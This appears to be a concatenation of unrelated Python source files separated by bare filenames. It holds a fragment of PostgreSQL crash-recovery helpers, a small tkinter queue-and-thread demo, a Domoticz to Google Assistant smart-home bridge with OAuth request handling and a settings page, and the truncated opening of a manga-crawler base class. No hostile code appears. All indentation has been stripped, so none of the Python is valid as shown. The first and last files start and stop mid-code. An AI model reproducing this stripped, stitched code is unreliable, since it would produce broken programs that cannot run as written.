"""returns the list of option names/values from postgres.opts, Empty dict if read failed or no file"""
result = {}
try:
with open(os.path.join(self._postgresql.data_dir, 'postmaster.opts')) as f:
data = f.read()
for opt in data.split('" "'):
if '=' in opt and opt.startswith('--'):
name, val = opt.split('=', 1)
result[name.strip('-')] = val.rstrip('"\n')
except IOError:
logger.exception('Error when reading postmaster.opts')
return result
def single_user_mode(self, communicate=None, options=None):
"""run a given command in a single-user mode. If the command is empty - then just start and stop"""
cmd = [self._postgresql.pgcommand('postgres'), '--single', '-D', self._postgresql.data_dir]
for opt, val in sorted((options or {}).items()):
cmd.extend(['-c', '{0}={1}'.format(opt, val)])
# need a database name to connect
cmd.append('template1')
return self._postgresql.cancellable.call(cmd, communicate=communicate)
def cleanup_archive_status(self):
status_dir = os.path.join(self._postgresql.wal_dir, 'archive_status')
try:
for f in os.listdir(status_dir):
path = os.path.join(status_dir, f)
try:
if os.path.islink(path):
os.unlink(path)
elif os.path.isfile(path):
os.remove(path)
except OSError:
logger.exception('Unable to remove %s', path)
except OSError:
logger.exception('Unable to list %s', status_dir)
def ensure_clean_shutdown(self):
self.cleanup_archive_status()
# Start in a single user mode and stop to produce a clean shutdown
opts = self.read_postmaster_opts()
opts.update({'archive_mode': 'on', 'archive_command': 'false'})
self._postgresql.config.remove_recovery_conf()
output = {}
ret = self.single_user_mode(communicate=output, options=opts)
if ret != 0:
logger.error('Crash recovery finished with code=%s', ret)
logger.info(' stdout=%s', output['stdout'].decode('utf-8'))
logger.info(' stderr=%s', output['stderr'].decode('utf-8'))
return ret == 0 or None
|
tk2thread.py
|
import queue
import threading
import time
import tkinter
from tkinter import ttk
the_queue = queue.Queue()
def thread_target():
while True:
message = the_queue.get()
if message is None:
print("thread_target: got None, exiting...")
return
print("thread_target: doing something with", message, "...")
time.sleep(1)
print("thread_target: ready for another message")
def on_click():
the_queue.put("hello")
root = tkinter.Tk()
big_frame = ttk.Frame(root)
big_frame.pack(fill='both', expand=True)
ttk.Button(big_frame, text="Click me", command=on_click).pack()
threading.Thread(target=thread_target).start()
root.mainloop()
# we get here when the user has closed the window, let's stop the thread
the_queue.put(None)
|
smarthome.py
|
# -*- coding: utf-8 -*-
import hashlib
import os
import re
import subprocess
import sys
import threading
from collections.abc import Mapping
from itertools import product
import requests
import trait
from auth import *
from const import (DOMOTICZ_TO_GOOGLE_TYPES, ERR_FUNCTION_NOT_SUPPORTED, ERR_PROTOCOL_ERROR, ERR_DEVICE_OFFLINE,
TEMPLATE, ERR_UNKNOWN_ERROR, ERR_CHALLENGE_NEEDED, DOMOTICZ_GET_ALL_DEVICES_URL,
DOMOTICZ_GET_SETTINGS_URL, DOMOTICZ_GET_ONE_DEVICE_URL, DOMOTICZ_GET_SCENES_URL, groupDOMAIN,
sceneDOMAIN, CONFIGFILE, LOGFILE, lightDOMAIN, switchDOMAIN, blindsDOMAIN, pushDOMAIN, climateDOMAIN,
tempDOMAIN, lockDOMAIN, invlockDOMAIN, colorDOMAIN, mediaDOMAIN, speakerDOMAIN, cameraDOMAIN,
REQUEST_SYNC_BASE_URL,
REPORT_STATE_BASE_URL, securityDOMAIN, outletDOMAIN, sensorDOMAIN, doorDOMAIN, selectorDOMAIN,
fanDOMAIN, ATTRS_BRIGHTNESS, ATTRS_THERMSTATSETPOINT, ATTRS_COLOR_TEMP, ATTRS_PERCENTAGE, VERSION)
from helpers import (configuration, readFile, saveFile, SmartHomeError, SmartHomeErrorNoChallenge, AogState, uptime,
getTunnelUrl, FILE_DIR, logger, ReportState, Auth, logfilepath)
DOMOTICZ_URL = configuration['Domoticz']['ip'] + ':' + configuration['Domoticz']['port']
try:
logger.debug("Connecting to Domoticz on %s" % DOMOTICZ_URL)
r = requests.get(
DOMOTICZ_URL + '/json.htm?type=command¶m=addlogmessage&message=Connected to Google Assistant with DZGA v' + VERSION,
auth=(configuration['Domoticz']['username'], configuration['Domoticz']['password']), timeout=(2, 5))
except Exception as e:
logger.error('Connection to Domoticz refused with error: %s' % e)
try:
import git
repo = git.Repo(FILE_DIR)
except:
repo = None
ReportState = ReportState()
if not ReportState.enable_report_state():
logger.error("Service account key is not found.")
logger.error("Report state will be unavailable")
def checkupdate():
if 'CheckForUpdates' in configuration and configuration['CheckForUpdates'] == True:
try:
r = requests.get(
'https://raw.githubusercontent.com/DewGew/Domoticz-Google-Assistant/' + repo.active_branch.name + '/const.py')
text = r.text
if VERSION not in text:
update = 1
logger.info("========")
logger.info(" New version is availible on Github!")
else:
update = 0
return update
except Exception as e:
logger.error('Connection to Github refused! Check configuration.')
return 0
else:
return 0
update = checkupdate()
# some way to convert a domain type: Domoticz to google
def AogGetDomain(device):
if device["Type"] in ['Light/Switch', 'Lighting 1', 'Lighting 2', 'RFY']:
if device["SwitchType"] in ['Blinds', 'Blinds Inverted', 'Venetian Blinds EU', 'Venetian Blinds US',
'Blinds Percentage', 'Blinds Percentage Inverted']:
return blindsDOMAIN
elif 'Door Lock' == device["SwitchType"]:
return lockDOMAIN
elif 'Door Lock Inverted' == device["SwitchType"]:
return invlockDOMAIN
elif "Door Contact" == device["SwitchType"]:
return doorDOMAIN
elif device["SwitchType"] in ['Push On Button', 'Push Off Button']:
return pushDOMAIN
elif 'Motion Sensor' == device["SwitchType"]:
return sensorDOMAIN
elif 'Selector' == device["SwitchType"]:
return selectorDOMAIN
elif 'Camera_Stream' in configuration and True == device["UsedByCamera"] and True == \
configuration['Camera_Stream']['Enabled']:
return cameraDOMAIN
elif 'Image_Override' in configuration and 'Switch' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Switch']:
return switchDOMAIN
elif 'Image_Override' in configuration and 'Light' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Light']:
return lightDOMAIN
elif 'Image_Override' in configuration and 'Media' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Media']:
return mediaDOMAIN
elif 'Image_Override' in configuration and 'Outlet' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Outlet']:
return outletDOMAIN
elif 'Image_Override' in configuration and 'Speaker' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Speaker']:
return speakerDOMAIN
elif 'Image_Override' in configuration and 'Fan' in configuration['Image_Override'] and device["Image"] in \
configuration['Image_Override']['Fan']:
return fanDOMAIN
else:
return lightDOMAIN
elif 'Group' == device["Type"]:
return groupDOMAIN
elif 'Scene' == device["Type"]:
return sceneDOMAIN
elif 'Temp' == device["Type"]:
return tempDOMAIN
elif 'Thermostat' == device['Type']:
return climateDOMAIN
elif 'Temp + Humidity' == device['Type']:
return tempDOMAIN
elif 'Temp + Humidity + Baro' == device['Type']:
return tempDOMAIN
elif 'Color Switch' == device["Type"] and "Dimmer" == device["SwitchType"]:
return colorDOMAIN
elif 'Color Switch' == device["Type"] and "On/Off" == device["SwitchType"]:
logger.info(device["Name"] + " (Idx: " + device[
"idx"] + ") is a color switch. To get all functions, set this device as Dimmer in Domoticz")
return lightDOMAIN
elif 'Color Switch' == device["Type"] and device["SwitchType"] in ['Push On Button', 'Push Off Button']:
return pushDOMAIN
elif 'Security' == device["Type"]:
return securityDOMAIN
return None
def getDesc(state):
if state.domain == sceneDOMAIN or state.domain == groupDOMAIN:
if 'Scene_Config' in configuration:
desc = configuration['Scene_Config'].get(int(state.id), None)
return desc
elif 'Device_Config' in configuration:
desc = configuration['Device_Config'].get(int(state.id), None)
return desc
else:
return None
def getDeviceConfig(descstr):
ISLIST = ['nicknames']
rawconfig = re.findall(r'<voicecontrol>(.*?)</voicecontrol>', descstr, re.DOTALL)
if len(rawconfig) > 0:
try:
lines = rawconfig[0].strip().splitlines()
cfgdict = {}
for l in lines:
assign = l.split('=')
varname = assign[0].strip().lower()
if varname != "":
if varname in ISLIST:
allvalues = assign[1].split(',')
varvalues = []
for val in allvalues:
varvalues.append(val.strip())
cfgdict[varname] = varvalues
else:
varvalue = assign[1].strip()
if varvalue.lower() == "true":
varvalue = True
elif varvalue.lower() == "false":
varvalue = False
cfgdict[varname] = varvalue
except:
logger.error('Error parsing device configuration from Domoticz device description:', rawconfig[0])
return None
return cfgdict
return None
def getAog(device):
domain = AogGetDomain(device)
if domain is None:
return None
aog = AogState()
aog.name = device["Name"] # .encode('ascii', 'ignore')
aog.domain = domain
aog.id = device["idx"]
aog.entity_id = domain + aog.id
aog.state = device.get("Data", "Scene")
aog.level = device.get("LevelInt", 0)
aog.temp = device.get("Temp")
aog.humidity = device.get("Humidity")
aog.setpoint = device.get("SetPoint")
aog.color = device.get("Color")
aog.protected = device.get("Protected")
aog.maxdimlevel = device.get("MaxDimLevel")
aog.seccode = settings.get("SecPassword")
aog.secondelay = settings.get("SecOnDelay")
aog.tempunit = settings.get("TempUnit")
aog.battery = device.get("BatteryLevel")
aog.hardware = device.get("HardwareName")
aog.selectorLevelName = device.get("LevelNames")
aog.language = settings.get("Language")
if lightDOMAIN == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if outletDOMAIN == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if colorDOMAIN == aog.domain and "Dimmer" == device["SwitchType"]:
aog.attributes = ATTRS_BRIGHTNESS
if colorDOMAIN == aog.domain and "RGBWW" == device["SubType"]:
aog.attributes = ATTRS_COLOR_TEMP
if climateDOMAIN == aog.domain and "Thermostat" == device["Type"]:
aog.attributes = ATTRS_THERMSTATSETPOINT
if blindsDOMAIN == aog.domain and "Blinds Percentage" == device["SwitchType"]:
aog.attributes = ATTRS_PERCENTAGE
if blindsDOMAIN == aog.domain and "Blinds Percentage Inverted" == device["SwitchType"]:
aog.attributes = ATTRS_PERCENTAGE
# Try to get device specific voice control configuration from Domoticz
# Read it from the configuration file if not in Domoticz (for backward compatibility)
desc = getDeviceConfig(device.get("Description"))
if desc is None:
desc = getDesc(aog)
if desc is not None:
n = desc.get('nicknames', None)
if n is not None:
aog.nicknames = n
r = desc.get('room', None)
if r is not None:
aog.room = r
ack = desc.get('ack', False)
if ack:
aog.ack = ack
report_state = desc.get('report_state', True)
if not ReportState.enable_report_state():
aog.report_state = False
if not report_state:
aog.report_state = report_state
if aog.domain == cameraDOMAIN:
aog.report_state = False
return aog
aogDevs = {}
deviceList = {}
def getDevices(devices="all", idx="0"):
global aogDevs
global deviceList
url = ""
if "all" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_ALL_DEVICES_URL + configuration['Domoticz'][
'roomplan'] + '&filter=all&used=true'
elif "scene" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_SCENES_URL
elif "id" == devices:
url = DOMOTICZ_URL + DOMOTICZ_GET_ONE_DEVICE_URL + idx
r = requests.get(url, auth=(configuration['Domoticz']['username'], configuration['Domoticz']['password']))
if r.status_code == 200:
devs = r.json()['result']
for d in devs:
aog = getAog(d)
if aog is None:
continue
aogDevs[aog.entity_id] = aog
req = {aog.name: {}}
req[aog.name]['idx'] = int(aog.id)
req[aog.name]['type'] = aog.domain
req[aog.name]['state'] = aog.state
req[aog.name]['nicknames'] = aog.nicknames
req[aog.name]['willReportState'] = aog.report_state
logger.debug(json.dumps(req, indent=2, sort_keys=False, ensure_ascii=False))
devlist = [(d.name, int(d.id), d.domain, d.state, d.room, d.nicknames, d.report_state) for d in aogDevs.values()]
devlist.sort(key=takeSecond)
deviceList = json.dumps(devlist)
def takeSecond(elem):
return elem[1]
def deep_update(target, source):
"""Update a nested dictionary with another nested dictionary."""
for key, value in source.items():
if isinstance(value, Mapping):
target[key] = deep_update(target.get(key, {}), value)
else:
target[key] = value
return target
settings = {}
def getSettings():
"""Get domoticz settings."""
global settings
url = DOMOTICZ_URL + DOMOTICZ_GET_SETTINGS_URL
r = requests.get(url, auth=(configuration['Domoticz']['username'], configuration['Domoticz']['password']))
if r.status_code == 200:
devs = r.json()
settings['SecPassword'] = devs['SecPassword']
settings["SecOnDelay"] = devs["SecOnDelay"]
settings['TempUnit'] = devs['TempUnit']
settings['Language'] = devs['Language']
logger.debug(json.dumps(settings, indent=2, sort_keys=False, ensure_ascii=False))
def restartServer():
"""Restart."""
logger.info(' ')
logger.info("Restart server")
logger.info(' ')
os.execv(sys.executable, ['python'] + sys.argv)
class _GoogleEntity:
"""Adaptation of Entity expressed in Google's terms."""
def __init__(self, state):
self.state = state
@property
def entity_id(self):
"""Return entity ID."""
return self.state.entity_id
def traits(self):
"""Return traits for entity."""
state = self.state
domain = state.domain
features = state.attributes
t = [Trait(state) for Trait in trait.TRAITS
if Trait.supported(domain, features)]
return t
def sync_serialize(self):
"""Serialize entity for a SYNC response.
https://developers.google.com/actions/smarthome/create-app#actiondevicessync
"""
state = self.state
enableReport = ReportState.enable_report_state()
traits = self.traits()
# Found no supported traits for this entity
if not traits:
return None
if enableReport:
reportState = state.report_state
else:
reportState = enableReport
device = {
'id': state.entity_id,
'name': {
'name': state.name
},
'attributes': {},
'traits': [trait.name for trait in traits],
'willReportState': reportState,
'deviceInfo': {
'manufacturer': "Domoticz",
"model": state.hardware
},
'type': DOMOTICZ_TO_GOOGLE_TYPES[state.domain],
}
# use aliases
aliases = state.nicknames
if aliases:
device['name']['nicknames'] = aliases
# add room hint if annotated
room = state.room
if room:
device['roomHint'] = room
for trt in traits:
device['attributes'].update(trt.sync_attributes())
return device
def query_serialize(self):
"""Serialize entity for a QUERY response.
https://developers.google.com/actions/smarthome/create-app#actiondevicesquery
"""
state = self.state
# if state.state == STATE_UNAVAILABLE:
# return {'online': False}
attrs = {'online': True}
for trt in self.traits():
deep_update(attrs, trt.query_attributes())
return attrs
def execute(self, command, params, challenge):
"""Execute a command.
https://developers.google.com/actions/smarthome/create-app#actiondevicesexecute
"""
executed = False
for trt in self.traits():
if trt.can_execute(command, params):
ack = self.state.ack # ack is now stored in state
pin = False
if configuration['Domoticz']['switchProtectionPass']:
protect = self.state.protected
else:
protect = False
if protect or self.state.domain == securityDOMAIN:
pin = configuration['Domoticz']['switchProtectionPass']
if self.state.domain == securityDOMAIN:
pin = self.state.seccode
ack = False
if challenge is None:
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'pinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif not challenge.get('pin', False):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'userCancelled',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif True == protect and pin != challenge.get('pin'):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'challengeFailedPinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif self.state.domain == securityDOMAIN and pin != hashlib.md5(
str.encode(challenge.get('pin'))).hexdigest():
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'challengeFailedPinNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
if ack:
if challenge is None:
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'ackNeeded',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
elif not challenge.get('ack', False):
raise SmartHomeErrorNoChallenge(ERR_CHALLENGE_NEEDED, 'userCancelled',
'Unable to execute {} for {} - challenge needed '.format(
command, self.state.entity_id))
trt.execute(command, params)
executed = True
break
if not executed:
raise SmartHomeError(ERR_FUNCTION_NOT_SUPPORTED,
'Unable to execute {} for {}'.format(command, self.state.entity_id))
def async_update(self):
"""Update the entity with latest info from Domoticz."""
if self.state.domain == groupDOMAIN or self.state.domain == sceneDOMAIN:
getDevices('scene')
else:
getDevices('id', self.state.id)
class SmartHomeReqHandler(OAuthReqHandler):
global smarthomeControlMappings
global aogDevs
def __init__(self, *args, **kwargs):
super(SmartHomeReqHandler, self).__init__(*args, **kwargs)
self._request_id = None
def report_state(self, states, token):
"""Send a state report to Google."""
data = {
'requestId': self._request_id,
'agentUserId': token.get('userAgentId', None),
'payload': {
'devices': {
'states': states,
}
}
}
ReportState.call_homegraph_api(REPORT_STATE_BASE_URL, data)
def smarthome_process(self, message, token):
request_id = self._request_id # type: str
inputs = message.get('inputs') # type: list
if len(inputs) != 1:
return {'requestId': request_id, 'payload': {'errorCode': ERR_PROTOCOL_ERROR}}
handler = smarthomeControlMappings.get(inputs[0].get('intent'))
if handler is None:
return {'requestId': request_id, 'payload': {'errorCode': ERR_PROTOCOL_ERROR}}
try:
result = handler(self, inputs[0].get('payload'), token)
return {'requestId': request_id, 'payload': result}
except SmartHomeError as err:
return {'requestId': request_id, 'payload': {'errorCode': err.code}}
except Exception as e:
logger.error(e)
return {'requestId': request_id, 'payload': {'errorCode': ERR_UNKNOWN_ERROR}}
def smarthome_post(self, s):
logger.debug(s.headers)
a = s.headers.get('Authorization', None)
token = None
if a is not None:
types, tokenH = a.split()
if types.lower() == 'bearer':
token = Auth['tokens'].get(tokenH, None)
if token is None:
raise SmartHomeError(ERR_PROTOCOL_ERROR, 'not authorized access!!')
message = json.loads(s.body)
self._request_id = message.get('requestId')
logger.info("Request " + json.dumps(message, indent=2, sort_keys=False, ensure_ascii=False))
response = self.smarthome_process(message, token)
try:
if 'errorCode' in response['payload']:
logger.info('Error handling message %s: %s' % (message, response['payload']))
except:
pass
s.send_json(200, json.dumps(response, ensure_ascii=False).encode('utf-8'), True)
logger.info("Response " + json.dumps(response, indent=2, sort_keys=False, ensure_ascii=False))
def smarthome(self, s):
s.send_message(500, "not supported")
def forceDevicesSync(self):
userAgent = self.getUserAgent()
enableReport = ReportState.enable_report_state()
if userAgent is None:
return 500 # internal error
data = {"agentUserId": userAgent}
if enableReport:
r = ReportState.call_homegraph_api(REQUEST_SYNC_BASE_URL, data)
elif 'Homegraph_API_Key' in configuration and configuration['Homegraph_API_Key'] != 'ADD_YOUR HOMEGRAPH_API_KEY_HERE':
r = ReportState.call_homegraph_api_key(REQUEST_SYNC_BASE_URL, data)
else:
logger.error("No configuration for request_sync available")
return r
def syncDevices(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('sync'))
return
r = self.forceDevicesSync()
s.send_message(200, 'Synchronization request sent, status_code: ' + str(r))
def restartServer(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('restart'))
return
s.send_message(200, 'Restart request sent, status_code: True')
restartServer()
def settings(self, s):
user = self.getSessionUser()
if user is None or user.get('uid', '') == '':
s.redirect('login?redirect_uri={0}'.format('settings'))
return
update = checkupdate()
confJSON = json.dumps(configuration)
public_url = getTunnelUrl()
message = ''
meta = '<!-- <meta http-equiv="refresh" content="5"> -->'
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
def settings_post(self, s):
enableReport = ReportState.enable_report_state()
update = checkupdate()
confJSON = json.dumps(configuration)
public_url = getTunnelUrl()
logs = readFile(os.path.join(logfilepath, LOGFILE))
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
meta = '<!-- <meta http-equiv="refresh" content="5"> -->'
if s.form.get("save"):
textToSave = s.form.get("save", None)
codeToSave = textToSave.replace("+", " ")
saveFile(CONFIGFILE, codeToSave)
message = 'Config saved'
logger.info(message)
logs = readFile(os.path.join(logfilepath, LOGFILE))
code = readFile(os.path.join(FILE_DIR, CONFIGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("backup"):
codeToSave = readFile(os.path.join(FILE_DIR, CONFIGFILE))
saveFile('config/config.yaml.bak', codeToSave)
message = 'Backup saved'
logger.info(message)
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("restart"):
message = 'Restart Server, please wait a minute!'
meta = '<meta http-equiv="refresh" content="20">'
code = ''
logs = ''
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
restartServer()
if s.form.get("sync"):
if 'Homegraph_API_Key' in configuration and configuration['Homegraph_API_Key'] != 'ADD_YOUR HOMEGRAPH_API_KEY_HERE' or enableReport == True:
r = self.forceDevicesSync()
time.sleep(0.5)
if r:
message = 'Devices syncronized'
else:
message = 'Homegraph api key not valid!'
else:
message = 'Add Homegraph api key or a Homegraph Service Account json file to sync devices here!'
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("reload"):
message = ''
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("deletelogs"):
logfile = os.path.join(logfilepath, LOGFILE)
if os.path.exists(logfile):
f = open(logfile, 'w')
f.close()
logger.info('Logs removed by user')
message = 'Logs removed'
logs = readFile(os.path.join(logfilepath, LOGFILE))
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
if s.form.get("update"):
repo.git.reset('--hard')
repo.remotes.origin.pull()
message = 'Updating to latest ' + repo.active_branch.name + ', please wait a minute!'
meta = '<meta http-equiv="refresh" content="20">'
template = TEMPLATE.format(message=message, uptime=uptime(), list=deviceList, meta=meta, code=code,
conf=confJSON, public_url=public_url, logs=logs, update=update)
s.send_message(200, template)
subprocess.call(['pip', 'install','-r', os.path.join(FILE_DIR, 'requirements/pip-requirements.txt')])
restartServer()
def delay_report_state(self, states, token):
time.sleep(3)
self.report_state(states, token)
def smarthome_sync(self, payload, token):
"""Handle action.devices.SYNC request.
https://developers.google.com/actions/smarthome/create-app#actiondevicessync
"""
devices = []
states = {}
aogDevs.clear()
getDevices() # sync all devices
getSettings()
enableReport = ReportState.enable_report_state()
for state in aogDevs.values():
entity = _GoogleEntity(state)
serialized = entity.sync_serialize()
if serialized is None:
continue
devices.append(serialized)
if state.report_state:
try:
states[entity.entity_id] = entity.query_serialize()
except:
continue
if enableReport:
t = threading.Thread(target=self.delay_report_state, args=(states, token)).start()
return {
'agentUserId': token.get('userAgentId', None),
'devices': devices,
}
def smarthome_query(self, payload, token):
"""Handle action.devices.QUERY request.
https://developers.google.com/actions/smarthome/create-app#actiondevicesquery
"""
devices = {}
for device in payload.get('devices', []):
devid = device['id']
_GoogleEntity(aogDevs.get(devid, None)).async_update()
state = aogDevs.get(devid, None)
if not state:
# If we can't find a state, the device is offline
devices[devid] = {'online': False}
continue
e = _GoogleEntity(state)
devices[devid] = e.query_serialize()
return {'devices': devices}
def smarthome_exec(self, payload, token):
"""Handle action.devices.EXECUTE request.
https://developers.google.com/actions/smarthome/create-app#actiondevicesexecute
"""
entities = {}
results = {}
states = {}
enableReport = ReportState.enable_report_state()
for command in payload['commands']:
for device, execution in product(command['devices'],
command['execution']):
entity_id = device['id']
new_state = execution.get('params')
# Happens if error occurred. Skip entity for further processing
if entity_id in results:
continue
if entity_id not in entities:
if len(aogDevs) == 0:
getDevices()
getSettings()
state = aogDevs.get(entity_id, None)
if state is None:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': ERR_DEVICE_OFFLINE}
continue
entities[entity_id] = _GoogleEntity(state)
try:
entities[entity_id].execute(execution['command'], execution.get('params', {}),
execution.get('challenge', None))
except SmartHomeError as err:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': err.code}
logger.error(err)
except SmartHomeErrorNoChallenge as err:
results[entity_id] = {'ids': [entity_id], 'status': 'ERROR', 'errorCode': err.code,
'challengeNeeded': {'type': err.desc}}
logger.error(err)
final_results = list(results.values())
for entity in entities.values():
if entity.entity_id in results:
continue
entity.async_update()
# final_results.append({'ids': [entity.entity_id], 'status': 'SUCCESS', 'states': entity.query_serialize()})
final_results.append({'ids': [entity.entity_id], 'status': 'SUCCESS', 'states': new_state})
if state.report_state:
try:
# states[entity.entity_id] = entity.query_serialize()
states[entity.entity_id] = new_state
except:
continue
if state.report_state == True and enableReport == True:
self.report_state(states, token)
return {'commands': final_results}
def smarthome_disconnect(self, payload, token):
"""Handle action.devices.DISCONNECT request.
https://developers.google.com/assistant/smarthome/develop/process-intents#DISCONNECT
"""
return None
if 'userinterface' in configuration and configuration['userinterface'] == True:
smarthomeGetMappings = {"/smarthome": SmartHomeReqHandler.smarthome,
"/sync": SmartHomeReqHandler.syncDevices,
"/settings": SmartHomeReqHandler.settings,
"/restart": SmartHomeReqHandler.restartServer}
smarthomePostMappings = {"/smarthome": SmartHomeReqHandler.smarthome_post,
"/settings": SmartHomeReqHandler.settings_post}
else:
smarthomeGetMappings = {"/smarthome": SmartHomeReqHandler.smarthome,
"/sync": SmartHomeReqHandler.syncDevices,
"/restart": SmartHomeReqHandler.restartServer}
smarthomePostMappings = {"/smarthome": SmartHomeReqHandler.smarthome_post}
smarthomeControlMappings = {'action.devices.SYNC': SmartHomeReqHandler.smarthome_sync,
'action.devices.QUERY': SmartHomeReqHandler.smarthome_query,
'action.devices.EXECUTE': SmartHomeReqHandler.smarthome_exec,
'action.devices.DISCONNECT': SmartHomeReqHandler.smarthome_disconnect}
|
basemangacrawler.py
|
"""
An abstract base class for a Manga with Chapters.
"""
import os
import json
import shutil
import logging
from time import sleep
from typing import List, Any
from queue import Empty, Queue
from functools import lru_cache
from threading import Thread, Event
from abc import ABC, abstractmethod
import requests
from tqdm import tqdm
from bs4 import BeautifulSoup
logger = logging.getLogger(__name__)
console = logging.getLogger("console")
####################################################################################################
# PAGE
####################################################################################################
class Page:
"""
The page of the manga.
Parameters:
idx: The index/order of the page.
pageUrl: The main URL of the HTML of the page.
dirPath: The path of the directory where the page image will be saved.
imageUrl: The URL of the page image.
"""
def __init__(self, idx: int, pageUrl: str, dirPath: str, imageUrl: str = None) -> None:
if idx < 1:
raise ValueError('The index must be a positive number.')
if pageUrl is None or pageUrl == '':
raise ValueError('The pageUrl must not be None.')
if dirPath is None or dirPath == '':
raise ValueError('The dirPath must not be None.')
self.idx: int = idx
self.pageUrl: str = pageUrl
self.dirPath: str = dirPath
self.imageUrl: str = imageUrl
def fileExists(self) -> bool:
"""
Returns true if the downloaded image already exists.
Returns false if the filepath is None or if the downloaded image does not exist.
"""
filepath = self.filepath
if filepath is None:
return False
return os.path.exists(filepath)
@property
def filename(self) -> str:
"""
The filename of the downloaded image.
None if the imageUrl is None.
"""
if self.imageUrl is None:
return None
_, ext = os.path.splitext(self.imageUrl)
return f'page{self.idx:04}{ext}'
@property
def filepath(self) -> str:
"""
The filepath of the downloaded image.
None if the filename is None.
"""
filename = self.filename
if filename is None:
return None
return os.path.join(self.dirPath, filename)
def download(self) -> None:
"""
Download the image.
Raises:
An exception if anything went wrong while downloading image.
"""
if self.imageUrl is None:
logger.error('Cannot download page %d (%s), imageUrl is None.', self.idx, self.pageUrl)
raise ValueError('Cannot download image, imageUrl is None.')
response = requests.get(self.imageUrl, stream=True)
response.raise_for_status()
if not os.path.exists(self.dirPath):
os.makedirs(self.dirPath)
with open(self.filepath, 'wb') as outputFile:
shutil.copyfileobj(response.raw, outputFile)
del response
def toDict(self) -> dict:
"""
Returns the dictionary representation of the Page.
"""
return {
'idx': self.idx,
'pageUrl': self.pageUrl,
'dirPath': os.path.abspath(self.dirPath),
'imageUrl': self.imageUrl
}
####################################################################################################
# CHAPTER
####################################################################################################
class Chapter:
"""
The chapter of the manga.
Parameters:
idx: The index/order of the chapter. Note that this may be different from
the chapter title if there are some special chapters (e.g. Chapter 10.5).
url: The main URL of the chapter.
dirPath: The path of the directory where the chapter will be saved.
title: The title of the chapter. If None, the title will be set to the index.
pages: The pages of the chapter.
"""
def __init__(self, idx: int, url: str, dirPath: str, title: str = None,
pages: List[Page] = None) -> None:
if idx < 1:
logger.error('Failed to initialize chapter, index %d is invalid.', idx)
raise ValueError('The index must be a positive number.')
if url is None or url == '':
logger.error('Failed to initialize chapter %d, URL is None.', idx)
raise ValueError('The URL must not be None.')
if title is None:
title = f'chapter{idx:04}'
self.idx: int = idx
self.url: str = url
self.title: str = title
self.dirPath: str = dirPath
self.pages: List[Page] = [] if pages is None else pages
@property
def hasPages(self) -> bool:
"""
True if the pages list is populated with pages. False otherwise.
"""
return self.pages is not None and len(self.pages) > 0
@property
def isDownloaded(self) -> bool:
"""
True if the pages list is populated with pages and all of them
have already been downloaded. False otherwise.
"""
return self.hasPages and all(page.fileExists() for page in self.pages)
def toDict(self) -> dict:
"""
Returns the dictionary representation of the Chapter.
"""
return {
'idx': self.idx,
'url': self.url,
'title': self.title,
'dirPath': os.path.abspath(self.dirPath),
'pages': [page.toDict() for page in self.pages]
}
####################################################################################################
# BASE MANGA CRAWLER
####################################################################################################
class BaseMangaCrawler(ABC):
"""
An abstract base class for a Manga.
Attributes:
url: The main URL of the manga.
baseDirPath: The path of the base output directory.
dirPath: The path of the directory where the manga will be saved.
cachePath: The path of the JSON cache file.
title: The title of the manga.
chapters: The chapters of the manga.
numChapterThreads: The number of chapter processing threads.
numPageThreads: The number of page downloading threads.
Raises:
ValueError: When the given parameters are invalid.
FileNotFoundError: When the cachePath is specified, but file was not found.
"""
def __init__(self, url: str, baseDirPath: str, dirPath: str = None,
